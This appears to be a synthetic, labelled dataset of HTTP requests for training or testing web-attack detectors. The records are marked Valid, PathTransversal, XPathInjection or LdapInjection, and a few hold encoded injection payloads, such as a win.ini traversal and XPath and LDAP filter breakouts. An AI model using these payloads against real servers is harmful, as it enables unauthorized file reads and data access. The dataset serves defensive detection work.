Warning: 398 124.40.7.234 "EEnlnaotsirs0" "Fri, 15 Oct 04 03:31:48 GMT"
X-Forwarded-For: 77.46.33.144
X-Serial-Number: 89307518698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22165
Start - Id: 22658
class: Valid
GET /o.2c@ipL/ArrE0tce/tmpiF-ZhaW_2@/osPzrX/dTia/bn/oN915eeNnEidisyfeo/e9JtsFXaKnXrGr7u7l.jpg?w5h6wG5bgo2em=twindow.open0et+boa&ny8=s4l7ndobjecthtaccese%5C&rcotohY8c=mNleg9mmdnEaU3&td5rede=uhvi&zknh=%24xsss%3D%25j+linkpde&ooiWsnoonOe=ernd&cNjN-V4Awindow.openyU=I%27%3AwreSceiwherelogha&soip5sy=q%24steposition4honechild%296eSe%3Ce&veAdbatrn=meqeru%3B8te%25seRc5%3C&v.perl_RId3=37448&OI_Z=588001 HTTP/1.1
Host: www.ytocaenatC.be:80
Connection: keep-alive
Accept: image/*;q=0.1, audio/basic;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: un-a
Cache-Control: no-transform
Client-ip: 193.39.34.85
Cookie: me6sn5dkags=([oe;UaRduNotttTaT=vy9
Cookie2: $Version="25"
Date: Fri, 30 Oct 09 21:52:55 UTC
ETag: W/"sUU9-82FSsrzTeyUyAbh"
Expect: 1Nwcd72l=Miceae;aIed
From: aeteiv@dttlm6ae.org
If-Modified-Since: Fri, 10 Mar 06 24:51:56 CET
If-Unmodified-Since: Thu, 09 Mar 06 02:42:45 GMT
If-Match: *
If-None-Match: "eNbp5rExV_w5U28xk5"
If-Range: Thu, 04 Feb 10 05:12:51 UTC
Max-Forwards: 92
MIME-Version: 0.5
Pragma: 9pr6utsr=ecmsAet
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Digest uri=http://dtyhS.ch/oaxh/ntfeclkh/oagn/e3sk.asmx
Range: -708576,-3
Referer: http://www.rtrO8h.gov/jtays.gif
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 9.8; ex-o4; rv:7.3.3) Gecko/88864178
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 265x421
Via: FTP/7.9 www.btnlenEi.shtml:2301, 2.4 www.ate1.jpeg, Ntnno/1.1 167.5.48.109
Transfer-Encoding: compress
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 139 www.hnsi.shtml "stteZiesi" 
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 12701556330524195
----: ----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 22658
Start - Id: 12331
class: Valid
GET /yUs30aVbELmslnJF.exe?ar=ewnedkaxAooalm%25&rjsrefnipehaa=e9-J89jmHWum HTTP/1.1
Host: www.1rhHc1.cz
Connection: keep-alive
Accept: audio/x-wav;q=0.0, audio/x-wav;q=0.9, image/*;q=0.0
Accept-Charset: cp-936, iso-8859-15
Accept-Encoding: identity;q=0.2, deflate;q=0.8, identity, gzip;q=0.0
Accept-Language: nhlG-jemsidh;q=0.7, ttnids-eag4i, m-zaih4co;q=0.6, iNt-see;q=0.0
Cache-Control: max-stale
Client-ip: 120.80.21.176
Cookie: mlLlhXriWauarne=leCw3
Cookie2: $Version="899"
Date: Tue, 11 May 04 15:35:42 GMT
ETag: W/"0v-D@1MPy3dqaZ9lhM"
Expect: 100-continue
From: atRwrmd@teke.it
If-Modified-Since: Mon, 13 Nov 06 23:10:59 CET
If-Unmodified-Since: Sun, 26 Jul 09 08:28:09 CET
If-Match: *
If-None-Match: "XoKyaZK._ISIvsEn82"
If-Range: "8BPZUcW@QdXoU4d"
Max-Forwards: 35
MIME-Version: 2.7
Pragma: asm='3p6a'
Proxy-Authorization: eitfn ddWoshr1=obTeG
Authorization: NTLM Y210aURvYmNycnNBcHQ2aWE5dGM4dHQyNGkyaTBvcnJyOGlIc2lkZjJsdHN1czg=
Range: 39-7782,74-681
Referer: /phunhce/iwelo1pe.exe
TE: chunked;q=0.6,chunked;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/9.2 (compatible; Konqueror/4.9; Linux i586; ubqNen; epthnmnnrt)
UA-CPU: Sparc
UA-Disp: 5821,502,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9575x9608
Via: nrr/2.1 www.esrs7ocx.css:62562
Transfer-Encoding: identity
Upgrade: teoetN/7.2, ieenny/0.9, mcsshe/5.8, Ljw/4.1, lioa6/9.3
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 111.220.164.212
X-Serial-Number: 7580317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12331
Start - Id: 31321
class: Valid
GET /dl2CkmsNvvrQa1tW.html? HTTP/1.1
Host: www.a2ii7cwaI.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: b0wmeeo-f;q=0.9
Cache-Control: no-cache
Client-ip: 161.123.214.209
Cookie: cmdHjB-fo=yt? ;rSs=168029;puuu=4
Cookie2: $Version="563"
Date: Fri, 15 Apr 05 10:17:39 GMT
ETag: W/"Rui_W@SVD7G.5Z0BKtXO"
Expect: 100-continue
From: rgc6ndo@etox.net
If-Modified-Since: Fri, 14 Dec 07 24:21:51 UTC
If-Unmodified-Since: Sat, 31 Jan 04 13:58:45 GMT
If-Match: *
If-None-Match: "TFRRMJCIJ3JBLAvgPZNQ"
If-Range: Sat, 22 Nov 08 03:49:06 CET
Max-Forwards: 683
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest username="0himts4o"
Authorization: ntus qrrx=1TiSes
Range: -388719
Referer: /arereeo/iite/ncmuzuL/msest.js
TE: chunked;q=0.7,deflate;q=0.5
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.1 (compatible; MSIE 0.1; Win98; zxndat; ycdno; onbej3mer)
UA-CPU: MIPS
UA-Disp: 1773,6929,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5304x185
Via: 3.3 130.242.71.109:3, FTP/9.9 www.w1exahr.shtml, lxpis/0.7 110.30.225.53
Transfer-Encoding: compress
Upgrade: piC/1.9, snoer/6.7, 5naem/2.3, dlstE/7.8
Warning: 107 www.ohem.gif "gsElmnsdshO7" "Wed, 21 Mar 07 14:34:20 GMT"
X-Forwarded-For: 155.250.58.91
X-Serial-Number: 76735229395499245344
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31321
Start - Id: 36070
class: PathTransversal
GET /IfiborOslnno5/eWtW1SC/iL/nEc9opeslblssQ/3lmaeXrhehtrhaxSi/VKt@O/inputQSnpzPs/JJIT_3qJnN/h7Y-XpAzAsNe.71.swf?hmrxuautguiwr=tIvnY7CM_&F2=z%3A%5C%5CWINNT%5C%5Cwin.ini&eto8d=5737609&0OKNpositionX@1FE=mi%28m9&eeHndo=1JaM1Y&4mnrTsyjiitint=0378 HTTP/1.0
Host: 253.187.134.206:80
Connection: keep-alive
Accept: application/postscript;q=0.6
Accept-Charset: ks_c_5601-1987, windows-874;q=0.9, x-mac-turkish;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 200.128.28.203
Cookie: andX3E5Qu=tdot;nzmtmpf=547555686;aEfnEhn4=113;eeatal=mlyedshioHApt7regi
Cookie2: $Version="080"
Date: Wed, 13 May 09 03:29:39 GMT
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: taRsras
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 14 Oct 08 23:18:10 GMT
If-Unmodified-Since: Mon, 03 Apr 06 18:00:51 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Jul 08 11:34:28 GMT
Max-Forwards: 3
MIME-Version: 8.7
Pragma: VHK=soA
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: -31,-3,49859-
Referer: http://www.ee57.be/notn.php3
TE: deflate
Trailer: Warning
User-Agent: aj2NTeT1 (uutbEpEL)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: FTP/9.6 164.60.22.111:0, HTTP/8.3 150.2.224.144, 7.8 www.naxNc.htm:8073
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 279 www.ltoe.png "xusyt5s8mi" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36070
Start - Id: 25307
class: Valid
GET /B8phpX-Stjw@U3XT.css? HTTP/1.1
Host: 167.113.17.179:0392
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, windows-1258
Accept-Encoding: compress;q=0.1, compress;q=0.0, gzip, gzip, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 93.156.218.54
Cookie: eirIzefse9=h;processing-instructionpWnodew=aiss)iW;gxxu9ruafxoepl=xoeeIy;sUcgfr7vlpebaIt=1ni8el0ai;islsazobp=tlsdXL\tf9sei4ii9lm4
Cookie2: $Version="647"
Date: Thu, 20 Nov 08 17:10:28 UTC
ETag: W/"BeLSbMrJ4tuYhPRrS"
Expect: 2dteiEvg
From: xion@agin3dxsi.be
If-Modified-Since: Sun, 08 May 05 17:56:18 CET
If-Unmodified-Since: Sat, 18 Dec 04 22:41:22 CET
If-Match: "B5zzqSpABcRZ9mOCEv9"
If-None-Match: "_hnXpLnJPZzwaylAnEU"
If-Range: "6aOUOppf.1CCiYE-"
Max-Forwards: 1
MIME-Version: 0.0
Pragma: ryahhrd='mts'
Proxy-Authorization: NTLM YXI2aGl0d2VvZWFpc3V5c29hb2VncG9rVHNxbml1ZXJFZW1FZXQybm10bA==
Authorization: trhs 6a5iin=gseaSes
Range: 69-01
Referer: http://www.vasor4y.st/aOettret/dseeG.nsf
TE: gzip,trailers,chunked;q=0.8
Trailer: Accept-Language
User-Agent: sqs69e7r3o/7.8.0
UA-CPU: Sparc
UA-Disp: 9449,218,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 9336x783
Via: FTP/3.3 www.rrrwomI.shtml:00, 5.1 154.253.35.178, 9.7 www.edadeoia.html
Transfer-Encoding: compress
Upgrade: 4slo/3.2, rhinrd/9.2
Warning: 867 www.zzbDUi.html "towi6rgnratefntm" "Tue, 28 Dec 04 20:11:13 CET"
X-Forwarded-For: 57.51.182.235
X-Serial-Number: 0193702
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25307
Start - Id: 35746
class: XPathInjection
GET /Tcte0ennpstuisr/accepthM@vKdc4n/pNservicesGkB6idnT/x70RXZjSmtjS/gMnrjfknpmegeoro4n/3qtrhMyJVtrUl/tl8nCLr-AqSgjymRsaJc/adarpdytneitTNaae6i/tuNQIY/kiftpqNd/lvf8VbHknMm8Be/i3iBEH.png?Retn1a=102797&rgdg3nrsnp4ouaI=etu4eeA&ge7=wcohascriptohasys%3Atmplf&iwdeoruei3l0tf=759285093&fvety4MmAc=6t%27%5D+++++%7C++++P++%7C+%2F%2Fuser%5B++name%2Ftext%28++++%29++%3D+%27acm&etelneti0asz=5pp%29&2hhomNoa1dl6nio=epsmeln&hl5=j%3Bp%2F4tTarjspee HTTP/1.1
Host: www.on5ny.gov
Connection: n9zq
Accept: */*
Accept-Charset: iso-8859-6;q=0.6, x-mac-arabic;q=0.5, x-mac-greek;q=0.0, shift_jis, x-mac-greek;q=0.3
Accept-Encoding: *
Accept-Language: sekep-n1nntvwm
Cache-Control: max-stale=458
Client-ip: 149.222.22.125
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="357"
Date: Mon, 20 Sep 04 07:14:09 UTC
ETag: "UQRCXM-rpuSyTChl2N"
Expect: 100-continue
From: T5icshho@0Oledom8.gov
If-Modified-Since: Sun, 21 May 06 24:36:03 GMT
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: Thu, 15 Apr 10 10:13:58 UTC
Max-Forwards: 311
MIME-Version: 5.0
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: NTLM ZWFyOWRhbXVsb2V1ZDBsckhmOHJocm5JcnJpc2F0ZVI0YlRu
Range: 820401-
Referer: http://www.scyes.fr/haknsHe.nsf
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.3 (Machintosh; U; PPC 4.5; ln-tn; rv:8.8.4) Gecko/53182710
UA-CPU: x86
UA-Disp: 233,859,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.1 219.78.110.72, 6.7 www.an9t.png
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35746
Start - Id: 26405
class: Valid
GET /eoiasoetaawe/style6orormusrBchildpog/eJcw0WdgnyvQ31/6@TDGyILco1-rG.exe?rpmhgd=+unionsdtRnF&OEaewn=6rsteeRmitEhL&Iurbh=elr%27+a5it%3D9 HTTP/1.0
Host: www.teffhn.fr
Connection: keep-alive
Accept: audio/*;q=0.5, video/*, application/rtf;q=0.6
Accept-Charset: x-mac-japanese, iso-8859-9, iso-2022-jp;q=0.5
Accept-Encoding: deflate, deflate, identity, deflate, identity;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 250.193.90.10
Cookie: i2dbhtromeg=b<0;4za4=m?0d]p;jelNnncq=18830
Cookie2: $Version="60"
Date: Thu, 12 Feb 09 22:43:48 CET
ETag: W/"wloUOmI3ewrMPGyW"
Expect: 100-continue
From: aR5eoW@aIpYiyate.org
If-Modified-Since: Tue, 31 Oct 06 02:19:20 GMT
If-Unmodified-Since: Tue, 15 Jun 04 23:03:05 UTC
If-Match: *
If-None-Match: *
If-Range: "9T9ULjvohvv.hIO"
Max-Forwards: 3081
MIME-Version: 8.7
Pragma: wsdN=OmaEcn
Proxy-Authorization: NTLM dTRjYWl0dG1zZGVzbm5pbmRhYnNpZ2NlZWVnb2RNbmRudTU4c29uRXRnZQ==
Authorization: jae3oa eanBe=shu5ec
Range: 828-31900
Referer: /tXr7rnar/v8inrd.dll
TE: deflate,trailers,deflate;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.7 (compatible; MSIE 4.9; Linux i386; teon; 4lnl; etsrjSw)
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4505x535
Via: 4.8 6.252.39.142
Transfer-Encoding: compress
Upgrade: eias4/8.2, 0it/9.6, nutr/1.8
Warning: 537 76.89.152.125 "oqet1tn44temca" "Mon, 16 Jan 06 20:27:08 UTC"
X-Forwarded-For: 59.157.184.124
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26405
Start - Id: 38473
class: LdapInjection
GET /saoysueutcttdchao/blaeihraqcrw7o/rpyGLaG26t49Ve8PH/bn2afsMexorapxei8q/@vx3Qy9PX/o_SiApMnzEsrQp.jpg?o6is=9709003&okmwdoyww2etaaT=8&rnseteJrnoEar=%29++++%28++++%7C+%28tpx%3Dmyewe*%29 HTTP/1.0
Host: www.oled.gov
Connection: 3tyci
Accept: image/*;q=0.3, audio/*;q=0.3, image/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 7to-hlun4of;q=0.9, xehruec-tst, 1lseN-aete;q=0.4, eeohzem-z5Oe;q=0.9
Cache-Control: no-transform
Client-ip: 23.7.129.65
Cookie: noiatSeen=462VQqZi3wzp;prz9Lt=51852086;rrei=)yiwhereoc?risimgrt;oereD=btpkeoto
Cookie2: $Version="554"
Date: Thu, 14 Dec 06 02:25:10 CET
ETag: W/"vEDWR6w_MB0Mrrjov"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Tue, 01 Nov 05 05:50:47 GMT
If-Unmodified-Since: Wed, 02 Nov 05 21:26:07 UTC
If-Match: "YvDv9TrIFAa__EZrGJn"
If-None-Match: *
If-Range: Sun, 13 Dec 09 20:55:32 GMT
Max-Forwards: 59
MIME-Version: 6.7
Pragma: tel='sih'
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: NTLM ZWV0enVhYWJldW5seWV0cHRkcmZpcWRuZ2R0YmlYYXFBZXJnY2hFdHRuQUY=
Range: 24-,76759-,-19589
Referer: http://mam2as.it/revp1t3i/w6sAute.sh
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: Mozilla/5.2 (Windows; U; Win98 3.5; ea-od; rv:2.8.1) Gecko/14299991
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: HTTP/8.2 www.esNa.jpg, HTTP/4.2 50.206.238.222, 1.4 77.17.13.166
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 863 www.oneLt.gif "lrRpIern" "Sun, 11 Oct 09 06:27:08 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38473
Start - Id: 31232
class: Valid
GET /vWXcOGN/zz26fIPs68Ug/ho-ZTgEVAoGmIem./qilt/byLywaAimBx2/hariupeEbitsuiultt3/RVW/pm9fTveHsetogq/fIKpsexecCr8w/I1-vZadminFevallhNYN.jpg?nw3ajbwdaroauc6=m9j&U23w0kQqOJi=rbRMKWon&xOueeMuAeNa5Eq=s0t3nu&soa9nhdrl2anoea=490747585&e0clv0es2vmta=lbgkoei&_c-xH.co=0eihmnaeee3&oaaoss=sm%3Cne&TmtnntssiSlush=sa%40r7b9Z&ksne5iemtEA=r%3BdG&eSopenG_tmpwW=9994 HTTP/1.1
Host: 74.184.79.200:77
Connection: close
Accept: text/*;q=0.5, video/*, text/*;q=0.5
Accept-Charset: windows-1251;q=0.2, big5, utf-7;q=0.8, x-mac-hebrew;q=0.7
Accept-Encoding: gzip;q=0.2, gzip;q=0.3, compress;q=0.6
Accept-Language: y-p
Cache-Control: min-fresh=523
Client-ip: 126.82.213.147
Cookie: eqrshtetofrto=Rn;wecashaetybstte=8868
Cookie2: $Version="812"
Date: Fri, 18 Jan 08 01:52:15 UTC
ETag: W/"FmiWmSGow2Ubech68d"
Expect: 100-continue
From: DsosoD@ehto0.fr
If-Modified-Since: Sun, 27 Aug 06 06:08:35 CET
If-Unmodified-Since: Tue, 05 Oct 04 10:29:17 GMT
If-Match: *
If-None-Match: "@BFujRif1-0wIq8.avc_"
If-Range: Fri, 23 Dec 05 24:48:15 GMT
Max-Forwards: 6044
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: Basic Y096b3Rjc046ajg4ZW1oOXU=
Range: 835058-581
Referer: http://aaoo.com/scka6iit/bSEii.shtml
TE: deflate;q=0.7
Trailer: Proxy-Authorization
User-Agent: ttohe/0.8.6.4.5
UA-CPU: StrongARM
UA-Disp: 974,643,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 139x604
Via: erf/0.1 45.43.30.37
Transfer-Encoding: gzip
Upgrade: 8eraih/9.0, cSng/1.4, eiur/4.9
Warning: 470 www.PmqSon.tiff "etyxjzn" "Sat, 18 Jul 09 18:15:29 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 65900782326
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31232
Start - Id: 24440
class: Valid
GET /gfCLiEe/NgA69PrDm3l/i2UaF9cTyX4mtgkS1.p/ce9hAWhtnR/t3nzB7/rraFsoaae/dzP/access_log84eMF8Y/ctrsdlmrssrie.sh?VoEa7ora=fnU&zWzMFPN=1&ffwi9d62hueze=5438531&4us1md=2e&3zamEnd7=ihs%27o&afX_OEr91Lv=42281824&hRaayfddhkksIqt=m%27ydohscriptn&weo0fe=imm&9n=1544736&3IeoNAn=zVHhu&cesSrFaoe5O=ehditsdtthyfee&6otsyt0nthul=839&1H1OadminhhArxp=50 HTTP/1.1
Host: www.temmm2.de
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.9, compress;q=0.2
Accept-Language: p2sTs-j8ek;q=0.3, Tb-Ooyt, oate-eisi;q=0.7, t-esdty
Cache-Control: no-transform
Client-ip: 118.147.21.138
Cookie: OcRoQstyle=eHhoYDMT62D;ilogdseew=30;eanntnpz=79324140;edsienpcieaita=access_lognmwlinkimga|s'n;dep3stnb4=c-eld
Cookie2: $Version="35"
Date: Mon, 18 Jun 07 22:39:32 GMT
ETag: "jVWfnrsruwZeKSXuOnG"
Expect: 100-continue
From: xrsaui@sih37t8e.gov
If-Modified-Since: Sat, 02 Dec 06 20:48:07 CET
If-Unmodified-Since: Wed, 04 Jan 06 04:58:21 CET
If-Match: "6vsxHNvEorl6@W8qW"
If-None-Match: *
If-Range: "MhZY.11u@S5f2gmaB"
Max-Forwards: 2932
MIME-Version: 8.8
Pragma: d3=ustiito6
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: nhob tretymi=oamn
Range: -78
Referer: /toxaro/snnw/l1ttss/ncj5ls.swf
TE: gzip;q=0.6
Trailer: From
User-Agent: feniYya43plwj
UA-CPU: StrongARM
UA-Disp: 2319,894,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 257x1408
Via: 0.2 www.ltebns.jpg, opnf/3.4 www.iqoqeift.png, Eqal3/6.0 www.ddita.css
Transfer-Encoding: compress
Upgrade: I3r8es/8.7
Warning: 384 232.82.13.199:64408 "wtsat5ea1fS" "Fri, 28 May 04 19:43:14 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24440
Start - Id: 690
class: Valid
GET /jieX@yt3jO/gPwl9U/eWTb/t5IfOqT/ad1CKGsY8P.RePcw-l_/lFLpF.msf?tmidc_LacYJn=aean&Uu83idlocation=idh%5Dwtrcp+i7en%5Cd&eettGGqaparLn=2393967&dDobllicdBi2i=r%3Frllnpec+d2e&hdha=dss7eprocessing-instructioneUe8rftpog&1C=8850&esmeiuj=ho2_wX04 HTTP/1.0
Host: 219.218.185.85
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, iso-2022-jp;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: h1mdta-9ni;q=0.5, l0ueo-iNogclee
Cache-Control: only-if-cached
Client-ip: 80.195.233.91
Cookie: thegaenp=l wuoaou\Tcbe;oi=%u]ay;oasaeeag=nmhsab4;mCoh5rsjEh=huUqYBD-8;seiEaox=en%unoaHae;meeiebni6dhttcc=om
Cookie2: $Version="9"
Date: Sat, 15 Jul 06 06:18:45 GMT
ETag: W/"u8ql@tr3HaAANQtn"
Expect: 100-continue
From: nner@duenesjfts.gov
If-Modified-Since: Fri, 20 Aug 04 21:30:48 CET
If-Unmodified-Since: Thu, 25 Dec 08 19:14:17 CET
If-Match: *
If-None-Match: "zA0G8-cQHal5_@rgaR6"
If-Range: Thu, 25 Aug 05 06:54:52 UTC
Max-Forwards: 78
MIME-Version: 2.3
Pragma: etw=nnh
Proxy-Authorization: Digest username="hihtp"
Authorization: Basic VG5pNTpyeWJoc3Bl
Range: 41-
Referer: http://i7aIlnlf.be/1dees.png
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.1 (Windows; U; Win 9x 2.3; Uq-7q; rv:9.4.8) Gecko/71644416
UA-CPU: x86
UA-Disp: 667,0755,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 312x096
Via: FTP/5.3 www.axfe.html, HTTP/1.3 135.232.121.13, 4.0 8.84.88.243:9
Transfer-Encoding: identity
Upgrade: oSn/9.1, 0siske/3.9, 0h5b/6.6, hkpn/7.4
Warning: 395 119.100.16.106 "T0trozfto" "Fri, 08 May 09 24:52:53 GMT"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 40090704001637847095
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 690
Start - Id: 11008
class: Valid
GET /K7vDfM4DHjoiframeZ/tmeoe31eAsohekate/96bosecl.cgi?nrush6yhi6fiTs=cZGg0sx..&Kgt2N@5NK=ch&lhnhoru=tWVe4Y&Rvjs4to83=iwsheraIuewipfmge HTTP/1.0
Host: www.foloyndewo.it
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: sos4='fwOeupih'
Client-ip: 201.77.21.42
Cookie: tWaEibsaIdinte=sel47Aeodta;barisnAnvpr=97524784;8wsetutasbtie=r2CgausDa@J
Cookie2: $Version="17"
Date: Fri, 04 Mar 05 23:53:55 UTC
ETag: "9zaHIlbRk0sS1PMR"
Expect: aoitsr=Ai0ma
From: aewoeu@ihehwo.net
If-Modified-Since: Fri, 24 Nov 06 07:22:17 GMT
If-Unmodified-Since: Sun, 19 Feb 06 11:53:11 CET
If-Match: *
If-None-Match: "SEXB1EMGZeUo_OkAXm"
If-Range: Sat, 19 Feb 05 19:48:23 CET
Max-Forwards: 4
MIME-Version: 9.8
Pragma: h43Ymlla='vta'
Proxy-Authorization: ayTqd ipelosnh=nhw7hz
Authorization: Basic ZWxuODllYXM6dG9vZg==
Range: 583-
Referer: http://www.alodO.fr/ueeela/irnmc.bin
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: dtjcnibzd/5.1
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 124x705
Via: 1.2 www.sodhtsb.jpeg:41, 7.7 243.127.110.33
Transfer-Encoding: identity
Upgrade: lhnj/8.6, tEe/2.7, nte/7.2
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11008
Start - Id: 2326
class: Valid
GET /kno/wsvB65WYLw/Nol/xXOv9kLF9RX1i/uJWlsC0uxKPGp./mTRsmJKz80z.exe? HTTP/1.1
Host: www.gnTc5t.cz
Connection: nsu2h
Accept: text/*;q=0.5, audio/*, audio/*;q=0.8
Accept-Charset: euc-cn, isiri-3342, windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=0756
Client-ip: 23.190.221.43
Cookie: Tr5ton=yasl
Cookie2: $Version="201"
Date: Mon, 14 Apr 08 21:00:02 GMT
ETag: W/"12r_mDVpIiXqbKs@hcS9"
Expect: 100-continue
From: omno@duATd.net
If-Modified-Since: Tue, 30 Oct 07 12:03:53 UTC
If-Unmodified-Since: Sat, 17 Oct 09 21:20:14 UTC
If-Match: "L6EDfvEbrSVeZWY"
If-None-Match: "zFgjTP3ubRqas8UaJq3"
If-Range: *
Max-Forwards: 6135
MIME-Version: 5.5
Pragma: ottAN='anaeO1Ix'
Proxy-Authorization: dajt egdm=itdutal
Authorization: Basic Z29pcjplbHJob2Ft
Range: 744728-20044,-10
Referer: http://www.iiots.uk/aeeretsk/vrrork/damxgvm7.pl
TE: deflate
Trailer: Cache-Control
User-Agent: Mozilla/9.5 (Machintosh; U; Mac OS X 9.2; 1i-xs; rv:3.0.5) Gecko/69484044
UA-CPU: PowerPC
UA-Disp: 581,250,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 130x258
Via: 5.6 www.utceesc.htm
Transfer-Encoding: identity
Upgrade: 8urhtn/9.4, iyaa/2.8, reh/0.2, oEt/0.3
Warning: 577 www.dr7dc0.jpeg "thtn1momzurbsO" "Wed, 09 Jun 04 22:21:46 GMT"
X-Forwarded-For: 250.186.179.59
X-Serial-Number: 7123081582615631
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2326
Start - Id: 14008
class: Valid
GET /dcnagcatrsd5oA35nei/fW@5/umPN_H1MGdRUGdCtsH_/n_tjkpBK/nV6uK2/WscriptjcIC/et/oZiRlZi/r6o3@.shtml?ecrWrw4rt=T%5Cim7sabHctnetcattelneth&bhwyr=9565010&Aimiia=9&eoAyxfuel=3091415&za=088&irmq7aiebn=48&nenra=49&9w=w31twlehrarmeolh&0jD.=o4sdpz%40eti&th2eeiuVrLshen=azKJp44LJEpW&lb4=noixztpiT- HTTP/1.1
Host: 134.120.203.248
Connection: keep-alive
Accept: text/html;q=0.1, application/zip;q=0.1, text/xml
Accept-Charset: windows-1250
Accept-Encoding: identity;q=0.3, compress;q=0.2, deflate;q=0.1
Accept-Language: *
Cache-Control: aaklnaqi='od0'
Client-ip: 134.74.211.38
Cookie: aNngnapsUnyusss=qo nEtall;raWoenKnei8mar=ef);uaos=hb:;lDRTlxidV=79823338;od90ogstr=591
Cookie2: $Version="0"
